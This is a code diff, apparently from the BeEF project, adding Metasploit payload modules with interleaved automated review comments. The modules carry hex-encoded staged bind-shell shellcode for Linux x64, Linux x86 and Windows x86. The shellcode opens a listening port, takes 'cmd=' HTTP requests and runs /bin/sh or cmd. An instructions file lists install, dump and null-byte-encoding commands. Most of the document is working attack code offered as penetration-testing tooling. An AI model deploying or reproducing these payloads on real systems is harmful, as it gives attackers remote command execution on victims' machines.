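Review bot: `handler_type` uses an explicit `return "beef_bind"` while `general_handler_type` a few lines below relies on the implicit `"bind"`; pick one form, e.g. drop the `return`. The `# Start a new handler` comment inside `add_handler` is misleading because `start_handler` is declared as an empty placeholder further down the same file; say so where the call is made, `# Placeholder: start_handler is a no-op in this handler`. The commented-out `#OptAddress.new('RHOST', ...)` entry in `register_options` should be removed or given a one-line reason for being kept, since dead option code in an options list tends to be resurrected without review.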
@@ -0,0 +1,85 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 165, 'n' ] + }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" + + "\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" + + "\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" + + "\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" + + "\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" + + "\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" + + "\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" + + "\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" + + "\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" + + "\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" + + "\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" + + "\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" + + "\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" + + "\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" + + 
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" + + "\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" + + "\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" + + "\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" + + "\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" + + "\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" + + "\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" + + "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" + + "\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" + + "\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" + + "\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + + "\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" + + "\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" + + "\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" + + "\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" + + "\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" + + "\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" + + "\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" + + "\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" + + "\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" + + "\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" + + "\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" + + "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" + + "\xf6\x48\x31\xd2\x0f\x05" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb new file mode 100644 index 000000000..bbb9e715f --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb 
@@ -0,0 +1,84 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 168, 'n' ] + }, + 'Payload' => + "\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" + + "\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" + + "\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" + + "\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" + + "\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" + + "\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" + + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" + + "\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" + + "\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" + + "\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" + + "\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" + + "\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" + + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" + + "\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" + + 
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" + + "\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" + + "\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" + + "\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" + + "\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" + + "\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" + + "\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" + + "\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" + + "\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" + + "\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" + + "\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" + + "\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" + + "\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" + + "\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" + + "\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" + + "\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" + + "\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" + + "\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" + + "\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" + + "\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" + + "\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" + + "\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" + + "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb new file mode 100644 index 000000000..c9dc7767d --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb 
@@ -0,0 +1,137 @@ +## +# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$ +## + + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Windows Command Shell Stage (stager)', + 'Version' => '$Revision: 11421 $', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Ty Miller' ], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShellWindows, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 511, 'n' ] + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" + + "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" + + "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + + "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" + + "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" + + "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" + + "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" + + "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" + + + "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" + + "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" + + "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" + + "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + + "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" + + "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" + + "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" + + "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" + + 
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" + + "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" + + + "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" + + "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" + + "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" + + "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" + + "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" + + "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" + + "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" + + "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" + + "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" + + "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + + + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" + + "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" + + "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" + + "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" + + "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" + + "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" + + "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" + + "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" + + "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" + + + "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" + + "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" + + "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" + + "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" + + "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" + + "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" + + "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" + + "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" + + + "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" + + "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" + + "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" + + "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" + + "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" + + "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" + + "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" + + "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" + + + 
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" + + "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" + + "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" + + "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" + + "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" + + "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" + + "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" + + "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" + + "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" + + "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" + + + "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" + + "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" + + "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" + + "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" + + "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" + + "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" + + "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" + + "\xff\xd5\xe9\x58\xfe\xff\xff" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb new file mode 100644 index 000000000..4ef9a5b10 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb 
@@ -0,0 +1,49 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 54, 'n' ] }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" + + "\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" + + "\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" + + "\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" + + "\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" + + "\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" + + "\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" + + "\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" + + "\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" + + "\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" + + "\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" + + "\x01\xc6\xff\xe6" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb new file mode 100644 index 000000000..7174e7498 --- /dev/null 
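Review bot: `require 'msf/core/handler/beef_bind'` names a path this commit does not add — the handler is committed as `beef_bind-handler.rb` beside this module and only becomes `lib/msf/core/handler/beef_bind.rb` after the manual `cp` step listed in instructions.txt, so loading the module from this directory raises a LoadError. A comment above the require, `# resolves only once beef_bind-handler.rb is installed as lib/msf/core/handler/beef_bind.rb (see instructions.txt)`, would make the prerequisite visible. The same applies to beef_bind-stager-linux-x86.rb and beef_bind-stager-windows-x86.rb.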
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb @@ -0,0 +1,47 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 47, 'n' ] }, + 'Payload' => + "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" + + "\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" + + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" + + "\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" + + "\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" + + "\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" + + "\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" + + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" + + "\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" + + "\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb new file mode 100644 index 000000000..a8ae2da82 --- /dev/null 
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb 
@@ -0,0 +1,62 @@ +## +# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Version' => '$Revision: 9179 $', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Ty Miller'], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 200, 'n' ] }, + 'Payload' => + # Length: 299 bytes + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + + "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + + 
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" + + "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" + + "\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" + + "\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" + + "\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" + + "\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt new file mode 100644 index 000000000..d1c0fc2ff --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt 
@@ -0,0 +1,37 @@ + +Install into Metasploit on BackTrack: + +cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb +cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb +cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb +cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb +cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb +cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb +cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb + +Check it works: + +msfpayload -l | grep beef_bind + + +Get info on the payload: + +msfpayload windows/beef_shell/beef_bind S + + +Dump stager and stage in C format: + +msfpayload windows/beef_shell/beef_bind C + + +Dump stager in raw format: + +msfpayload windows/beef_shell/beef_bind R > beef_bind-stager + + +Encode stager to remove nulls: + +msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00' + + + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm new file mode 100644 index 000000000..43325cf76 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm 
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
